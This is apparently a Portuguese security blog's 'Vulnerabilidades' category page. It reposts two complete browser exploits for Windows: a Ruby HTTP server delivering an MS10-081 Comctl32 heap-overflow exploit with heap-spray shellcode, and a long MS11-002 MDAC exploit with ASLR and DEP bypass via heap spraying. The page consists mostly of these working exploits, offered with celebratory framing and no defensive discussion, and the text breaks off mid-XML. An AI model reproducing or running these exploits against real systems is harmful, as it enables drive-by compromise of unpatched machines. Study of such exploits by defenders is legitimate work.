Assinatura RSS

Arquivo da categoria: Vulnerabilidades

Iphone perdido? Passwords perdidas! Você: Hacked

Publicado em

Pesquisadores alemães do  Instituto Fraunhofer de Tecnologia da Informação Segura (SIT) demonstraram como recuperar logins e passwords do Iphone 4 com a ajuda do JailBreak

Segue a POC da técnica:

Anúncios

MS10-081: Windows Common Control Library (Comctl32) Heap Overflow

Publicado em
Não poderia deixar de postar a nova vulnerabilidade em windows ;)


#!/usr/bin/env ruby

# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson

require 'socket'

def http_send(sock, data, opts={})
 defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
 opts = defaults.merge(opts)

 code = opts[:code]
 message = opts[:message]
 type = opts[:type]

 date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
 headers = "HTTP/1.1 #{code} #{message}\r\n" +
 "Date: #{date_str}\r\n" +
 "Content-Length: #{data.length}\r\n" +
 "Content-Type: #{type}\r\n\r\n"
 puts "[+] Sending #{opts[:desc]}"
 sock.write(headers + data) rescue return false
 return true
end

def sock_read(sock, out_str, timeout=5)
 begin
 if Kernel.select([sock],[],[],timeout)
 out_str.replace(sock.recv(1024))
 puts "[+] Received:"
 puts "    " + out_str.split("\n")[0]
 return true
 else
 sock.close
 return false
 end
 rescue Exception => ex
 return false
 end
end

port = ARGV[0] || 55555

transform_name = "\x21" * 65535

svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg"
 xmlns:xlink="http://www.w3.org/1999/xlink">

 <rect x="50" y="50" height="110" width="110"
 style="fill: #ffffff"
 transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
 >
 </rect>
 <text x="100" y="100">CLICK ME</text>
</svg>
SVG

html = <<-HTML
<html>
 <body>
 <script>
 <!--
 function str_dup(str, length) {
 var result = str;
 while(result.length < length) {
 result += result;
 }
 return result.substr(result.length - length);
 }

 var shellcode = unescape("%u9000%u9090%u9090") +
 // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
 unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
 "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
 "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
 "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
 "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
 "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
 "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
 "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
 "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
 "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
 "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
 "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
 "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
 "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
 "%u7c96%u0e88");
 var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
 var arr = [];
 for(var i = 0; i < 2000; i++) {
 arr[i] = document.createElement("a");
 arr[i].innerHTML = [base + shellcode].join("");
 }
 -->
 </script>
 <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
 </body>
</html>
HTML

puts "[+] Listening on port #{port}"
puts

TCPServer.open(port) do |srv|
 while true
 cli = srv.accept
 req = ""
 next unless sock_read(cli, req, 5)
 while req.length > 0
 if req =~ /GET.*svg/i
 break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
 elsif req =~ /QUIT/
 exit()
 else
 break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
 end
 req = ""
 next unless sock_read(cli, req, 5)
 end
 cli.close rescue next
 end
end

MS11-002: Microsoft Data Access Components Vulnerability

Publicado em

Mensagem do dia: Fuck M$!

 


<html xmlns:t = "urn:schemas-microsoft-com:time">
 <head>
 <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License">
 <style>
 .body {

 }
 #test {

 }
 </style>
 <script src="heapLib.js"></script>
 <script>
 // This code has been released under the Q Public License by Trolltech
 // http://en.wikipedia.org/wiki/Q_Public_License
 // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/


var StartTime = new Date();
var FinalHeapSpraySize = 900;
//var SmallHoleSize = 0x1F0;
var SmallHoleSize = 0x240;
var GlobalRowCounter = 0;

var localxmlid1;
var localxmlid2;
var localxmlid3;
var localxmlid5;
var adobase = 0;
var finalspray = '';
var heap = null;
var ExpoitTime = 10;
var CurrentHeapSpraySize = 0;


function Start() {
 FaseOne();
}



function FaseOne() {

 localxmlid1 = document.getElementById('xmlid1').recordset;
 localxmlid2 = document.getElementById('xmlid2').recordset;
 localxmlid3 = document.getElementById('xmlid3').recordset;
 localxmlid5 = document.getElementById('xmlid5').recordset;

 localxmlid2.CacheSize = 0x40000358;

 localxmlid1.CacheSize = SmallHoleSize;;   //small hole?
 localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);
 localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);


 var my1field = localxmlid5.Fields.Item(0);
 localxmlid1.MoveFirst();

 localxmlid2.AddNew(["BBBB"], ["c"]);

 localxmlid1.Close();
 CollectGarbage();

 localxmlid3.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));
 localxmlid2.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));
 localxmlid5.CacheSize = 0x40000008;
 localxmlid5.MoveFirst();
 localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);

 var localxmlid4 = document.getElementById('xmlid4').recordset;

 localxmlid4.AddNew(["bb"], ["c"]);

 localxmlid4.MoveNext();


 var localxmlid6 = document.getElementById('xmlid6').recordset;
 localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]);

 localxmlid2.MoveFirst();

 Math.tan(1);

 document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';
 if(GlobalRowCounter < 0x10120) {
 window.setTimeout(IncreaseRowCounter, 100);
 }
}


function IncreaseRowCounter() {
 //alert('IncreaseRowCounter: ' + GlobalRowCounter)
 if(GlobalRowCounter < 0x10120) {
 for(i = 0; i < 0x300; i++) {
 GlobalRowCounter++;
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.Delete();
 }
 var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
 document.getElementById('progressfaseone').innerText = percentcomplete + "%";
 window.setTimeout(IncreaseRowCounter, 100);
 }
 else {
 document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
 window.setTimeout(FindADOBase, 100);
 }
}

function FindADOBase() {
 //alert('FindADOBase');


 var myfield = localxmlid3.Fields.Item(1);

 for(i = 0; i < 0xDF6; i++) {
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") {
 break;
 }
 }
 //alert('done first');

 void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));

 var vftable1 = null;
 var vftable2 = null;

 for(i = 0; i < 0xAE0; i++) {
 void(Math.atan2(0xbabe, ('add row: ' + i).toString()));
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 //if(i > 10) {
 //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n";
 //}
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {
 vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {
 vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(vftable1  && vftable2) {
 break;
 }
 }
 //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n";
 //alert(vftable1);
 if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {
 adobase = parseInt(vftable1,16) - 0x1AD68;
 document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);
 FaseTwo();
 }
 else {
 alert('sadly we failed to read the base address of msado15.dll 😦 ');
 }

}

function FaseTwo() {
 document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
 document.getElementById('progressfasetwo').innerText = '0%';
 heap = new heapLib.ie(0x20000);


 var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
 "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +
 "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");
 //"%u6163%u636C%u652D%u6578%u0000
 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578
 //c:\windows\system32\calc.exe
 //%63%61%6C%63%2E%65%78%65
 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65

 //var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");

 while(heapspray.length < 0x200) heapspray += unescape("%u4444");

 var heapblock = heapspray;
 while(heapblock.length < 0x40000) heapblock += heapblock;
 finalspray = heapblock.substring(2, 0x40000 - 0x21);

 //alert('Base address of ado15.dll ' + adobase.toString(16));
 if(CurrentHeapSpraySize < 900) {
 window.setTimeout(SprayHeap, 100);
 }
 else {
 RunExploit();
 }
}

function SprayHeap() {
 if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {
 for(var i = 0; i < 90; i++) {
 heap.alloc(finalspray);
 CurrentHeapSpraySize++;
 }
 var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);
 document.getElementById('progressfasetwo').innerText = percentcomplete + "%";
 window.setTimeout(SprayHeap, 100);
 }
 else {
 document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";
 window.setTimeout(RunExploitTimer, 100);
 }

}

function RunExploitTimer() {
 if(ExpoitTime > 0) {
 document.getElementById('countexploitrun').innerText = ExpoitTime;
 window.setTimeout(RunExploitTimer, 500);
 ExpoitTime--;
 }
 else {
 document.getElementById('countexploitrun').innerText = 0;
 var EndTime = new Date();
 var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);
 document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";
 window.setTimeout(RunExploit, 100);
 }
}

function RunExploit() {

 var elms = new Array();
 for(i =0; i < 100; i++) {
 elms.push(document.createElement('div'));
 }

 owningObj = document.styleSheets[0].owningElement;

 myimports = document.styleSheets[0].imports;

 document.appendChild(owningObj);
 document.removeChild(owningObj);

 owningObj.outerHTML = 'a';

 Math.atan2(0xbabe, "Collect");
 CollectGarbage();

 Math.atan2(0xbabe, "spray");
 for(i = 0; i < 100; i++) {
 elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
 }

 Result = owningObj.insertAdjacentElement(myimports,'a');


}

function MakeAddressString(addrint) {
 //First, turn into hex:
 var addstr = addrint.toString(16);
 //Split and swap
 addstr = addstr.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1");
 return addstr;
}

 </script>

 </head>
 <body onLoad="window.setTimeout(Start,100);" id="bodyid">
 <div>
 <h2 id="textfaseone"></h2>
 <br>
 <h2 id="progressfaseone"></h2>
 <br>
 <h2 id="textfaseonedone"></h2>
 <br>
 <h2 id="textfoundaddress"></h2>
 <br>
 <h2 id="textfasetwo"></h2>
 <br>
 <h2 id="progressfasetwo"></h2>
 <br>
 <h2 id="textfasetwodone"></h2>
 <br>
 <h2 id="countexploitrun"></h2>
 <br>
 <h2 id="totalruntime"></h2>
 </div>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid2">
<Devices>
<Device>
<BBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid3">
<root>
<data>
 <SmallData>
 </SmallData>
<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
 value1
